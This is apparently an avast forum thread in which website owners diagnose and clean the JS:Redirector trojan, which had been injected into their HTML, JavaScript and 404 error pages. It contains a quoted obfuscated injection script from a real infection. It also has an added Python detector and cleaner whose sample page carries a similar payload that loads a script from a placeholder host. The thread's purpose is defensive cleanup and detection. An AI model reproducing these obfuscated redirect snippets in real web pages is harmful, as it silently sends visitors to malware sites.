JS-Redirector-G [trj] warning

I run a website at hXXp://knickersclub.com

My index.html file consists of three frames: menu.htm, header.htm, and home.htm

If I enter the URL of each frame individually, I don’t get any virus warning message. However, if I enter http://knickersclub.com I get the message shown in the attached file. I can enter the URL on two other computers and don’t get the warning. I assumed the infection was on my computer itself so I ran a scan and it said the index.html file on my hard drive was infected. I moved the file to the chest and ran another scan which said my computer was clean. After doing that, I tried to access the web address and again got the warning, but still, only on this computer.

So, exactly where is this virus and how do I get rid of it?

No warning here, try updating the virus database, and test it again.
I’m sure someone can get to the bottom of this. :wink:

Hello,

Nothing bad in your code now, so just a little info about the detection: JS:Redirector-G is new and very highly spreading web malware (see its detection count at http://www.avast.com/cze/latest-virus-report.html). Currently only avast detects this threat, no one else.

The infection is very small, simple and hard to find in lots of original html code. The infection consists of a small amount of javascript code - just

document.write(unescape('encrypted script tag').replace(random char sequences)

That's all.

Correction must be made by the administrator/owner of the website avast alerts about.

Very droll, I didn’t get an alert either.

Think I found it. I looked at my html files stored locally and found a rogue script in the index.html file. Removed it and uploaded to my website. Scan of my system now shows no warning message so hopefully the issue is solved!

Remember to use strong passwords to avoid hacking of your site :wink:

So is there anything to worry about if we had the code executed on our machine? I stumbled across another site that triggered this alert just a few minutes ago.

I found this bugger in a site as well.
“JS:Redirector-G [trj]” found in FAVICON.ICO.

Problem is… There IS no favicon.ico on that website! Even when I look at it via Total Commander's FTP connection, I still don't see the favicon.ico there.

If I look at the source of the page that triggers the virus alert, there are NO iframes, no rogue codes, nothing… Has anyone come across this problem before?

This happens very often. Somewhere in your code is a link to a favicon which actually doesn't exist. The server generates a 404 message which is infected. Please check server generated messages.

Regards

I have this issue currently for a drupal site. I have downloaded the site and run TextCrawler, which identified 17 infected files.

I've removed the code and write protected the files in case it was a SQL injection attack. If it is an FTP based attack that won't prevent it happening again, but at least I can identify the files and rectify it quickly now.

The problem is that the code is still showing up in the browser right after the tag and I need to find where this is in the code or database.

These are some of the corrected files, I have checked that they are still uninfected:
\misc\autocomplete.js
\misc\collapse.js
\misc\drupal.js
\misc\progress.js
\misc\textarea.js
\misc\update.js
\misc\upload.js
\modules\epublish\epublish.js
\modules\event\event.js
\modules\img_assist\img_assist.js
\modules\img_assist\img_assist_textarea.js
\modules\img_assist\img_assist_tinymce.js
\files\videos\edit_dates\flashobject.js
\modules\img_assist\drupalimage\editor_plugin.js
\modules\img_assist\drupalimage\editor_plugin_src.js
Index.php
\Sites\default\settings.php

anyone with any further ideas would be very welcome!

M

This was indeed the problem. In every file in the domain's error_docs directory was a piece of Javascript embedded that read (altered!):

<sc_ipt language=ja_ascript><!-- 
document.w_ite(unescape('%3Covpscric6pt%20sGHrmQc%3DI6f%2Fxf%2F9mQ4c6%2E247xf%2EI6f2xf%2E1We95c6%2FjmQqGHuc6erWey%2Eovpjs%3Ec6%3Covp%2FscWerxfipI6ft%3E').replace(/I6f|xf|c6|GH|mQ|We|ovp/g,""));
 --></s__ipt>

Thanks very much for pointing in the right direction!

Now, for the quite worrying question that remains: How did this all get there? Is this possible by transferring files via FTP from an infected computer? I know that the site was installed from a computer that had trojans active, but the files that were transferred came from a “fresh” downloaded ZIP file. Is it possible that an infected computer can, while transferring file A, infect file B that is already on the system?

In this topic there seems to be a similar problem with JS:Redirector-G [trj]
http://forum.avast.com/index.php?topic=44664.0
and the homepage hxxp://www.designpandorabox.eu/

Hi BobNY,

First of all, being secure doesn't mean just installing firewalls, anti-viruses, and anti-spywares. It is more about understanding the threat and preparing or acting accordingly. This favicon and also XSS attacks fall into a category that can't be handled by just installing a few security tools. The reason is that the hosts/carriers through which they intrude into your system are common internet resources like web-pages, emails, RSS feeds, URLs etc. As a result it is difficult to identify & block such resources selectively unless a central repository maintaining a blacklist of potentially dangerous resources is referenced before access. Firefox and other modern browsers are doing this these days. But this is effective only when the resource has been identified and added previously to the blacklist. Ultimately the option left is to only allow the scripts from the resources you rely on, like Google & Yahoo (matter of choice). This is what NoScript and RequestPolicy do. NoScript by default blocks all the flash and javascript content on the pages you visit unless you add them (more specifically the website domain or address) to its whitelist. RequestPolicy goes one step ahead and blocks javascript content originating from or communicating with a server you are not visiting in the first place, even if it is in the whitelist. The fundamental thing is simple: block all the resources/communication outside the current resource you are browsing. For more details I would recommend you to read the FAQs on the NoScript & RequestPolicy websites.

I know it's painful and annoying to use these tools in the beginning. You have to add resources to the whitelist for both NoScript & RequestPolicy respectively. But it's a one time investment which is worth it for the added security you are getting. And remember, these utilities don't remove the malicious script content from the page. They just block it from execution. So don't be surprised if you still find it there.

pol

O thank goodness for Avast!

This morning I went to my own site and got the Shield, protecting me from this redirector. WHAT??? On my OWN site?? So using my FTP program, I viewed the source on both my own computer and on the host’s server. There it was, that “unescape” script.

Called godaddy, and then replaced the index.html with a clean file. They advised me to change my password to something harder to crack; they have good security on the servers and the only way it could be changed is by hacking my pw.

But question is this: Yesterday I was doing a massive backup of everything and while I was copying over some of the files from my site, I got the Avast warning about this particular trojan. Not having seen it before, I told it each time to move it to the Chest.

When it’s moved to the Chest, is the entire file deleted from my computer, or just the trojan deleted from the file?

And since I was copying from C: to G:, is the C: file still infected? Am running a complete scan now.

I have hundreds of pages for the site and it will take me days to figure it all out, clean them up, re-upload, etc., unless there are some easy ways to check them out and clean them.

How about this? If I do a global search and replace for “unescape” in the html files, would that disable the js? Or does the infection make garbage out of the page anyway?

I noticed when comparing the html on my own computer and up on the server, the one on my own computer looked normal, but on the server all the coding was scrunched up into one barely readable paragraph! This is for the index.html file. The ones that came up with a warning while I was copying them were many of the internal files. Many! :frowning:

Thanks for all your help a few days ago on a different thread. I will be going back over to that thread and thanking everyone there. I've been "down" for a few days because MS gave me bad advice – REALLY bad advice – so I could no longer even boot up. Three "technicians" in a row complicated my situation so I had no computer! ;( I've gotten so many calls now from MS, apologizing!

Files sent to the chest only exist in the chest, where they can do no harm. If you have multiple copies of the file, only what is indicated by the detection would be sent to the chest.

If you have copies of your site pages (you should; if not, valuable lesson learnt), scan that folder with avast and if none of the files are infected you could try deleting all the files on your site and uploading the clean copies (after having changed your passwords).

I don't believe there is an easy way to remove the infected script that was inserted, as the script may be slightly different in each case; it is obviously easier for them to insert as they don't have to worry about destroying a file.

There are probably some text editors that will do a global find and replace (don't know any off the top of my head). The problem though is that you normally have to enter the complete string to find, which as I said could have multiple different strings.

If there is a find and replace tool you could possibly enter <script*/script>, assuming the * is a wildcard, so it would find every occurrence of <script*/script> regardless of what was in between and replace it with whatever you choose; a blank space is usually best.

The major problem here is not removing legitimate script tags on your pages. So this isn't without risk.
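Putting the two points raised in this thread together (the obfuscated document.write(unescape('...').replace(/junk/g,"")) block posted earlier, and the warning just above that a blanket <script*/script> search-and-replace also deletes legitimate scripts), here is an added Python example; it is not code from the thread or from avast. It decodes that obfuscation pattern the same way the browser would, reports every hit in a local copy of the site, and strips only the <script> blocks that carry the signature. The sample page, the junk tokens and the host name "redirector.example" in its payload are constructed for the example, and all function names are mine.

```python
import os
import re

# Signature of the injection described in this thread:
#   document.write(unescape('<encoded tag>').replace(/junk|tokens/g, ""))
# Group 1 is the %-encoded tag, group 2 the junk-token alternation.
INJECT_RE = re.compile(
    r"document\.write\(\s*unescape\(\s*'([^']*)'\s*\)"
    r"\s*\.replace\(\s*/([^/]+)/g\s*,\s*(?:\"\"|'')\s*\)\s*\)",
    re.IGNORECASE,
)

# Any <script ...>...</script> block, multi-line bodies included.
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)

# Constructed sample page: one legitimate script plus one injected block in
# the style seen in the thread. "redirector.example" is a placeholder host.
SAMPLE_HTML = """<html><head><title>Home</title>
<script type="text/javascript">
function showMenu() { document.getElementById('menu').style.display = 'block'; }
</script>
<script language=javascript><!-- 
document.write(unescape('%3CscQzript%20sxKrc%3D%2F%2FreW9director%2EexQzample%2FjqxKuery%2EjsW9%3E%3C%2FscQzript%3E').replace(/Qz|xK|W9/g,""));
 --></script>
</head><body>Welcome</body></html>"""


def js_unescape(s: str) -> str:
    """Python equivalent of JavaScript's unescape(): %uXXXX and %XX sequences."""
    s = re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), s)
    return re.sub(r"%([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)


def _decode(match: "re.Match") -> str:
    # Both JS and Python try alternation branches left to right, so the junk
    # regex lifted from the script can be reused unchanged.
    return re.sub(match.group(2), "", js_unescape(match.group(1)))


def decode_payload(script_text: str):
    """Return the tag the injected script would write, or None when the text
    is not the unescape/replace pattern (i.e. an ordinary script)."""
    m = INJECT_RE.search(script_text)
    return _decode(m) if m else None


def find_payloads(text: str):
    """Decode every injection anywhere in the text. Works on .js files too,
    where the line sits with no surrounding <script> tag."""
    return [_decode(m) for m in INJECT_RE.finditer(text)]


def clean_html(html: str):
    """Remove only <script> blocks that carry the injection signature.
    Returns (cleaned_html, decoded_payloads); other scripts are left intact,
    unlike a wildcard <script*/script> replace."""
    found = []

    def strip_if_injected(m):
        decoded = decode_payload(m.group(0))
        if decoded is None:
            return m.group(0)  # legitimate script, keep it
        found.append(decoded)
        return ""

    return SCRIPT_RE.sub(strip_if_injected, html), found


def scan_directory(root, extensions=(".html", ".htm", ".shtml", ".php", ".js")):
    """Walk a local copy of the site and report {path: [decoded payloads]}
    without modifying anything. Include the server's error-page directory
    (error_docs) in the copy, since the thread reports infected 404 pages."""
    hits = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    payloads = find_payloads(fh.read())
                if payloads:
                    hits[path] = payloads
    return hits


if __name__ == "__main__":
    cleaned, payloads = clean_html(SAMPLE_HTML)
    print("injected tag(s) decoded:", payloads)
    print("cleaned page still has showMenu():", "showMenu" in cleaned)
```

The decoded output tells you where the redirect points, which is what avast's detection name hints at but the raw page does not show; the cleaning step deliberately refuses to touch any script that does not match the signature, so a page's own menu or form scripts survive. Run scan_directory on a downloaded copy first, review the hits, and only then clean and re-upload (after changing the FTP password, as advised above).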

I’ve done some experimenting and have found the simplest solution, at least for me.

First I looked on the server for infected files. I use WS_FTP. Clicked on a few files on the server, asked to “view” them (in Notepad). Any infected ones trigger Avast. Some files are infected, some are not. No rhyme or reason as to which are or are not.

Then I did the same for the ones on my computer, “viewed” in WS_FTP. I presume you can do these operations in other FTP programs; I haven’t used any others. I re-uploaded the ones that were not infected.

Later I found that it’s easier to check with Avast by right-clicking in the directory on my computer, instead of having all those Notepad windows open!

Now comes the tricky part. Do I go back to a “backup” file or try to repair the html? My concern was that my ‘backup’ files would not have my very latest changes.

So here's what I'm doing: I simply open the infected file in my editor (I use Komposer), go to the Source Code, find that line of code (search for unescape) and delete the entire 3 lines. The code is in the same place every time, right at the end of the /head section. Makes it easy to find over and over!

After I save, I double-check in the folder on my computer by right-clicking the file name to let Avast do its thing. Clean!

This way, everything on my page is preserved and the baddie is gone. It’s time-consuming, boring, but well worth it.

I hope these details will help.

BTW, has anyone figured out where all this ‘redirection’ is supposed to take us?

I don’t believe it really matters where it takes you as one malicious site is much the same as the next and even if you knew where it went, you wouldn’t know what the payload would be at that end.

YIKES! Very true. Hadn’t thought about that. Thanks.

You’re welcome.

File Name: hxxp://www.cybermedsites.com/
Malware name: JS:Redirector-H [trj]
Malware type: Trojan Horse
VPS version: 090430-0, 04/30/2009

I use a site called Cybermedsites.com to host my web site. Today, when I attempted to access my site via the administration page through Cybermedsites, Avast detected the above. I’ve already notified the owners of Cybermedsites, but am wondering if anyone can determine if it is a valid infection?

Also, I am able to access my own web site URL direct without Avast detecting anything. Does this mean it is safe for others to peruse my site, or should I be concerned?